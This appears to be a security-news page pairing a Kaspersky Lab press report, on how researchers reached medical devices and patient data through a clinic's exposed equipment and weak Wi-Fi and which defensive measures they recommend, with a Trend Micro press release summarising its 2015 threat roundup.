A modern clinic is a complicated system. It has sophisticated medical devices that comprise fully functional computers with an operating system and applications installed on them. Doctors rely on computers, and all information is stored in a digital format. In addition, all healthcare technologies are connected to the Internet.

So, it comes as no surprise that both medical devices and hospital IT infrastructure have previously been targeted by hackers. The most recent examples of such incidents are ransomware attacks against hospitals in the US and Canada. But a massive malicious attack is only one way in which criminals could exploit the IT infrastructure of a modern hospital.


Clinics store personal information about their patients. They also own and use very expensive, hard to fix and replace equipment, which makes them a potentially valuable target for extortion and data theft.

The outcome of a successful cyberattack against a medical organization could differ in detail but will always be dangerous. It could involve the following:

  • The felonious use of personal patient data: the resale of information to third parties or demanding the clinic pay a ransom to get back sensitive information about patients;
  • The intentional falsification of patient results or diagnoses;
  • Medical equipment damage may cause both physical damage to patients and huge financial losses to a clinic;
  • Negative impact on the reputation of a clinic.


Exposure to the Internet

The first thing the Kaspersky Lab expert set out to explore in this research was how many medical devices around the globe are now connected to the Internet. Modern medical devices are fully functional computers with an operating system, and most of them have a communication channel to the Internet. By hacking them, criminals could interfere with their functionality.

A quick look over the Shodan search engine for Internet-connected devices showed that hundreds of medical devices – from MRI scanners to cardiology equipment, radioactive medical equipment and other related devices – are registered there. This discovery leads to worrisome conclusions: some of these devices still run on old operating systems such as Windows XP, with unpatched vulnerabilities, and some even use default passwords that can be easily found in public manuals.

Using these vulnerabilities criminals could access a device interface and potentially affect the way it works.


Inside the clinic’s local network

The above-mentioned scenario was one of the ways in which cybercriminals could get access to the clinic’s critical infrastructure. But the most obvious and logical way is to attack its local network. And that is what happened: during the research, a vulnerability was found in the clinic’s Wi-Fi connection. Through a weak communications protocol, access to the local network was gained.

Exploring the clinic’s local network, the Kaspersky Lab expert found some of the medical equipment that had previously been found on Shodan. This time, however, no password at all was needed to access the equipment, because the local network was treated as a trusted network by the medical equipment applications and their users. This is how a cybercriminal can gain access to a medical device.

Further exploring the network, the Kaspersky Lab expert discovered a new vulnerability in a medical device application. A command shell was implemented in the user’s interface that could give cybercriminals access to personal patient information, including their clinical history and information about medical analysis, as well as their addresses and ID details. Moreover, through this vulnerability the whole device controlled with this application could be compromised. For example, among these devices could be MRI scanners, cardiology equipment, radioactive and surgical equipment.

Firstly, criminals could alter the way the device works and cause physical damage to the patients. Secondly, criminals could damage the device itself at immense cost to the hospital.

“Clinics are no longer only doctors and medical equipment, but IT services too. The work of a clinic’s internal security services affects the safety of patient data and the functionality of its devices. Medical software and equipment engineers put a lot of effort into creating a useful medical device that will save and protect human life, but they sometimes completely forget about protecting it from unauthorized external access. When it comes to new technologies, safety issues should be addressed at the first stage of the research and development (R&D) process.

IT security companies could help at this stage to address safety issues”, says Sergey Lozhkin, senior researcher at Kaspersky Lab’s GReAT.


Kaspersky Lab experts recommend implementing the following measures to protect clinics from unauthorized access:

  • Use strong passwords to protect all external connection points;
  • Update IT security policies, and develop timely patch management and vulnerability assessments;
  • Protect medical equipment applications in the local network with passwords, in case of unauthorized access to the trusted area;
  • Protect infrastructure from threats like malware and hacking attacks with a reliable security solution;
  • Backup critical information regularly and keep a backup copy offline.


Trend Micro 2015 Security Roundup Details

9 March 2016 – Today, Trend Micro Incorporated released its 2015 security roundup report, “Setting the Stage: Landscape Shifts Dictate Future Threat Response Strategies,” which dissects the most significant security incidents from 2015. The research confirms attackers are now bolder, smarter and more daring in attack vectors, cyberespionage efforts and cyber underground activity on a global basis.

“Our observations for 2015 have confirmed that traditional methods of protecting data and assets are no longer sufficient and should be reassessed to maintain the highest level of corporate and personal security,” said Raimund Genes, CTO, Trend Micro. “The prevalence and sophistication of extortion, cyberespionage and expanding targeted attacks now dictate that organizational security strategies must be prepared to defend against a potentially greater onslaught in 2016. This realization can help the security community better anticipate and respond to what attackers are trying to accomplish.”

Online extortion and cyberattacks were a top concern in 2015, with several high-profile organizations being victimized. Ashley Madison, Hacking Team, the Office of Personnel Management and Anthem were a few of these high-profile attacks that left millions of employees and customers exposed. A majority of data breaches in the U.S. in 2015 (41 percent) were caused by device loss, followed by malware and hacking.
Additional report highlights include:

  • Pawn Storm and Zero-Days – In 2015, more than 100 zero-days were discovered. In addition, the long-running cyberespionage campaign Pawn Storm utilized several zero-day exploits to target high-profile organizations, including a U.S. defense organization, the armed forces of a NATO country and several foreign affairs ministries.
  • Deep Web and Underground Explorations – In 2015, cybercriminal markets began to penetrate the recesses of the Deep Web. Each underground market mirrors the culture in which it resides, offering specific wares most profitable in each region.
  • Smart Technology Nightmares – Attacks against connected devices accelerated in 2015, proving their susceptibility. Smart cars and businesses, seen in Trend Micro’s GasPot experiment, were among a few of the new concerns brought by IoT technologies.
  • Angler, the ‘King of Exploit Kits’ – From malvertising to Adobe Flash, Angler Exploit Kit gained notoriety in 2015 as the most used exploit kit, accounting for 57.3 percent of overall exploit kit usage. Japan, the U.S. and Australia were among the countries most impacted by this attack.
  • Data Held Hostage – Crypto-ransomware rose to 83 percent of overall ransomware use in 2015. Cryptowall was the most frequently used variant, arriving on users’ computers via email or malicious downloads.
  • Takedowns versus DRIDEX – The seizure and takedown of the notorious DRIDEX botnet contributed to a significant decrease in detections within the U.S. However, this led to a resurgence due to the Command and Control infrastructure being hosted on a bulletproof hosting provider, making it virtually impossible to eradicate altogether.